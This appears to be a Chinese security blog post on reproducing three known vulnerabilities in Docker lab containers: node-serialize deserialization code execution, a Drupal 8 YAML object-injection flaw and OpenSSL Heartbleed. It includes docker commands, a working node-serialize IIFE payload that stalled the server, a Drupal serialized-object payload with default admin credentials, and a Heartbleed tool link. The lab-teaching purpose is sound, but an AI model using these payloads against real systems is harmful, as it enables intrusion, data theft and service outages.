【docker复现】分享几个小实例漏洞

漏洞1 Node.jsnode-serialize 反序列化

• Node.js存在反序列化远程代码执行漏洞,Node.js的node-serialize库中存在一个漏洞,该漏洞通过传输JavaScript IIFE,利用恶意代码(未信任数据)达到反序列化远程任意代码执行的效果。并且Nodejs服务端必须存在接收序列化的数据接口。

利用方法

• docker pull medicean/vulapps:n_nodejs_1

• docker run -d -p 1010:80 medicean/vulapps:n_nodejs_1

• 账户随意输入,在密码处输入

_$$ND_FUNC$$_function (){for(var start =+new Date; +new Date - start <= sleepTime; ) {}}(sleepTime=15000)

• 漏洞说明https://www.zhihu.com/question/55860542/answer/146625023

速度很快就出来了

一直在刷新,产生ddos效果,在试的时候网站已经挂了

漏洞2 Drupal远程命令执行漏洞

• 该漏洞是由于DrupalCore的YAML解析器在处理不安全的PHP对象句柄时,通过远程代码执行,进行高危行为操作;

• 漏洞检测

• 登陆Drupal管理后台,查看内核版本是8.x,且版本号低于8.3.4,则存在该漏洞;否则,不存在该漏洞;

• docker pull medicean/vulapps:d_drupal_1

• docker run -d -p 2000:80 medicean/vulapps:d_drupal_1

利用方法

• 登录后台访问

• http://ip:port/admin/config/development/configuration/single/import

admin/admin123

输入

!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

漏洞3 心脏滴血

Heartbleed OpenSSL CVE-2014-0160(心脏出血)

• CVE-2014-0160,心脏出血漏洞,是一个非常严重的OpenSSL 漏洞。这个漏洞使得攻击者可以从存在漏洞的服务器上读取64KB大小的内存信息。这些信息中可能包含非常敏感的信息,包括用户请求、密码甚至证书的私钥。

• 据称,已经有攻击者在某宝上尝试使用漏洞读取数据,在读取200次后,获取了40多个用户名和7个密码。

下载

docker pull medicean/vulapps:o_openssl_heartbleed

启动

docker run -d -p 2020:443 medicean/vulapps:o_openssl_heartbleed

利用方法

• https://github.com/akhld/heartbleed

• 图形化工具

• 在线检测http://fish.ijinshan.com/checkopenssl/check

原文发布于微信公众号 - 网络安全社区悦信安(yuexin_an)

原文发表时间:2017-11-17

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏抠抠空间

python并发编程之多进程(理论)

一、什么是进程 进程:正在进行的一个过程或者说一个任务。而负责执行任务则是cpu。 二、进程与程序的区别 程序:仅仅是一堆代 进程:是指打开程序运行的过程 三、...

4277
来自专栏拂晓风起

Flash:彻底理解crossdomain.xml、跨swf调用。

1873
来自专栏我的博客

php+ftp

$ftp_server = “122.207.221.101”;//主机ip或者域名 $conn_id = ftp_connect($ftp_server) o...

3635
来自专栏北京马哥教育

亲自动手写一个python库(二)

引言 经过上一节中所述,我们搭建好了一个Python环境用于库开发,我们在这一节真正开始搭建一个库,并将其发布。 项目文档结构 首先我们先构建出自己项目的文档...

3557
来自专栏Rgc

redis中key过期事件

刚到新公司一个月左右,有个新需求,想做定时任务,比如在用户注册时间的3天后推送用户一条消息。

3981
来自专栏武军超python专栏

2018年7月31日学习ubuntu的基础操作命令和打包压缩解压缩

今天遇到的新单词: faith n 信用,信任 usage n 用法 upload n上传

1674
来自专栏xiaoheike

Elasticsearch Network Settings

Elasticsearch 缺省情况下是绑定 localhost。对于本地开发服务是足够的(如果你在相同机子上启动多个节点,它还可以形成一个集群),但是你需要配...

1702
来自专栏云计算教程系列

如何在Nbuntu 18.04上将Nginx Web Root移动到新位置

在Ubuntu上,Nginx Web服务器将其文档存储在/var/www/html中,该文档通常位于其余具有操作系统部分的根文件系统上。但有时,将文档根移动到另...

770
来自专栏pangguoming

Git忽略规则.gitignore梳理

对于经常使用Git的朋友来说,.gitignore配置一定不会陌生。废话不说多了,接下来就来说说这个.gitignore的使用。

932
来自专栏小蠢驴iOS专题

iOS之手把手教你学会使用sqlite,并应用于实际开发

1363

扫码关注云+社区

领取腾讯云代金券